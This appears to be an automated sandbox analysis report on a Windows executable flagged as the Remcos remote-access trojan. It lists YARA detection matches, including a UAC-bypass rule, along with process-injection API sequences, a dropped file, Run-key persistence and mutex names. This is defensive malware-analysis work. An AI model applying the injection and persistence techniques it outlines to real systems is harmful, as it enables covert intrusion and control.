                    Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000008.00000002.253136648.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000008.00000002.253322818.0000000006190000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: Process Memory Space: SndVol.exe PID: 7120, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: colorcpl.exe PID: 6388, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00416702 ExitWindowsEx,LoadLibraryA,GetProcAddress,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: String function: 02CB4824 appears 328 times
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: String function: 02CB4698 appears 80 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 004346C2 appears 41 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00401E65 appears 33 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00434D80 appears 54 times
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCA6A0 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,RtlCreateUserThread,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCCAB0 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC7A50 GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCCB94 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC7B74 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC7B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCD85C InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,GetCurrentProcess,FlushInstructionCache,GetCurrentProcess,ExitProcess,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC79BC GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCCA20 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCCF5C CreateProcessAsUserW,NtCreateProcess,WaitForSingleObject,CloseHandle,CloseHandle,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC7F00 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,
                    Source: Fnvtdhenapsfwu.exeBinary or memory string: OriginalFilename vs Fnvtdhenapsfwu.exe
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.218479200.000000000EB7F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fnvtdhenapsfwu.exe
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000003.213652513.000000007EED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fnvtdhenapsfwu.exe
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.220939596.000000007F4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fnvtdhenapsfwu.exe
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.217337311.0000000002CD9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Fnvtdhenapsfwu.exe
                    Source: Fnvtdhenapsfwu.exe, 00000000.00000002.221331055.000000007FD20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Fnvtdhenapsfwu.exe
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeFile created: C:\Users\Public\Libraries\Fnvtdhen.PIFJump to behavior
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@6/3@4/3
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041A99C OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041B3FA FindResourceA,LoadResource,LockResource,SizeofResource,
                    Source: Fnvtdhenapsfwu.exeReversingLabs: Detection: 62%
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeFile read: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeJump to behavior
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\Fnvtdhenapsfwu.exe C:\Users\user\Desktop\Fnvtdhenapsfwu.exe
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: unknownProcess created: C:\Users\Public\Libraries\Fnvtdhen.PIF "C:\Users\Public\Libraries\Fnvtdhen.PIF"
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_004178A4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC6DC0 CoCreateInstance,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB7FB8 GetDiskFreeSpaceA,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCA2F0 CreateToolhelp32Snapshot,
                    Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\RmEEESSSssss-3AINT8
                    Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\Public\Libraries\Fnvtdhen.PIFFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
                    Source: Fnvtdhenapsfwu.exeStatic file information: File size 1243648 > 1048576
                    Source: Binary string: easinvoker.pdb source: Fnvtdhenapsfwu.exe, 00000000.00000002.218479200.000000000EB7F000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000003.213652513.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000002.220939596.000000007F4A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbH source: Fnvtdhenapsfwu.exe, 00000000.00000002.218479200.000000000EB7F000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000003.213652513.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fnvtdhenapsfwu.exe, 00000000.00000002.220939596.000000007F4A0000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: Fnvtdhenapsfwu.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.2.Fnvtdhenapsfwu.exe.2cb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.Fnvtdhenapsfwu.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\Public\Libraries\Fnvtdhen.PIF, type: DROPPED
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CD82F4 push 02CD835Fh; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB32F0 push eax; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB6372 push 02CB63CFh; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB6374 push 02CB63CFh; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CD80AC push 02CD8125h; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC3050 push 02CC309Dh; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCA038 push 02CCA070h; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CD81F8 push 02CD8288h; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CD8144 push 02CD81ECh; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CDC10C push eax; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CD76B0 push 02CD78C8h; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB9740 pushfd ; retf
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB6768 push 02CB67AAh; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB6766 push 02CB67AAh; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB9724 push FFFFFF9Ah; retf
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB9730 pushfd ; retf
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCD498 push ecx; mov dword ptr [esp], edx
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CBD584 push 02CBD5B0h; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CBC550 push ecx; mov dword ptr [esp], edx
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CBCBD0 push 02CBCD56h; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC6940 push 02CC69EBh; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCC908 push 02CCC940h; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC7904 push 02CC7981h; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CB6FFB push FFFFFFCBh; retf
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC2F44 push 02CC2FBAh; ret
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00457056 push ecx; ret
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0045B11A push esp; ret
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0045E54D push esi; ret
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00457978 push eax; ret
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00434DC6 push ecx; ret
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CC7B14 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeFile created: C:\Users\Public\Libraries\Fnvtdhen.PIFJump to dropped file
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeFile created: C:\Users\Public\Libraries\Fnvtdhen.PIFJump to dropped file
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_00406EB0 ShellExecuteW,URLDownloadToFileW,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FnvtdhenJump to behavior
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FnvtdhenJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 1_2_0041A99C OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeCode function: 0_2_02CCA074 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Fnvtdhenapsfwu.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
